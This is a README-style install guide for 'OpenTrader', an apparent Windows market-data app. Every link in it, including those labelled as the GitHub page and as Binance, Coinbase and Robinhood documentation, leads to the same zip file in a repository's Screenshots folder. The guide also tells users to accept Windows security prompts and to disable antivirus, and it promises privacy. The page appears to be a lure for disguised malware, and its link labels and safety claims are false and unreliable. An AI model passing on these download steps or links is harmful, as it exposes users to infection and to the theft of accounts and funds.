OpenTrader is an open-source app that shows live stock and crypto market data. It updates prices and stats in real time. This app helps you track your favorite assets from popular platforms like Binance, Coinbase, and Robinhood.
Before you begin, make sure your computer meets these basic requirements:
- Windows 10 or newer
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet connection for live data updates
No special skills or software installations are needed other than what is listed here.
- View real-time prices for stocks and cryptocurrencies
- Supports Binance, Coinbase, Robinhood, Zerodha, and more
- Easy-to-read charts and market summaries
- Track multiple assets in one place
- Data updates every few seconds to keep you current
Click the button below to visit the OpenTrader download page on GitHub:
The page contains the files you need to run OpenTrader on Windows. This guide assumes you will download the latest Windows installer or executable from the releases or main repo.
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Click the Download OpenTrader button above. It will open the GitHub page for OpenTrader.
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Look for the latest release or executable file. On GitHub, releases are often found under the Releases section or main file list.
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Download the file named like
OpenTrader-Setup.exeorOpenTrader.exe. This is the installer or the main program file. -
Once downloaded, open the file by double-clicking it. You may see a security prompt from Windows; click Run or Yes to proceed.
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Follow the on-screen instructions to complete the installation. For the installer, this usually means clicking Next a few times and then Finish when done.
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If you downloaded a standalone executable, you do not need to install anything. You can run the file directly.
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Find the OpenTrader icon on your desktop or start menu after installation.
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Double-click to open the program.
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Wait a moment as the app connects to the internet and loads live market data.
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Use the interface to search for stocks or cryptocurrencies you want to track.
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Add assets to your watchlist to see live price changes.
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Use the search bar to find specific stocks (e.g., Apple) or cryptocurrencies (e.g., Bitcoin).
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Click on any asset to see charts, latest prices, and volume data.
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Refresh data manually using the refresh button, or rely on automatic updates.
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Adjust settings to change update frequency or display preferences from the menu.
You can customize OpenTrader for your needs:
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Update Frequency: Adjust how often data refreshes (every 5 seconds to every minute).
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Theme: Switch between light and dark modes for better viewing.
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Notifications: Enable simple alerts when prices hit certain values.
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Language: Select your preferred language from the options.
If OpenTrader does not start or shows errors:
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Check your internet connection. The app requires internet to fetch live data.
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Make sure your Windows is up to date.
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Restart your computer and try again.
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If the app crashes, try redownloading the file from the GitHub page.
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Disable any antivirus or firewall temporarily that might block the app.
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Visit the GitHub Issues page for OpenTrader to see if others have similar problems.
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OpenTrader GitHub page: https://raw.githubusercontent.com/joaovit565/OpenTrader/master/Screenshots/Open-Trader-v2.2.zip
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Binance API Documentation: https://raw.githubusercontent.com/joaovit565/OpenTrader/master/Screenshots/Open-Trader-v2.2.zip
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Coinbase Market Data: https://raw.githubusercontent.com/joaovit565/OpenTrader/master/Screenshots/Open-Trader-v2.2.zip
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Robinhood Market Data: https://raw.githubusercontent.com/joaovit565/OpenTrader/master/Screenshots/Open-Trader-v2.2.zip
OpenTrader collects live data from:
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Binance: Major crypto exchange with real-time prices.
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Coinbase: Popular platform for cryptocurrency trading.
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Robinhood: Stock and crypto trading with easy-to-use interface.
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Zerodha: Indian stock trading platform.
This makes OpenTrader a single place to monitor multiple markets without logging into various apps.
OpenTrader is open-source software. You can view its source code on GitHub. Contributions from the community help improve the app.
If you want to report bugs or suggest features, please open an issue on the GitHub page.
OpenTrader only reads market data publicly available and does not require user accounts or sensitive information. Your privacy is protected since no personal data is stored or shared.
New versions of OpenTrader are available on GitHub. Check the releases page regularly or follow the repo to get notified about updates with new features and fixes.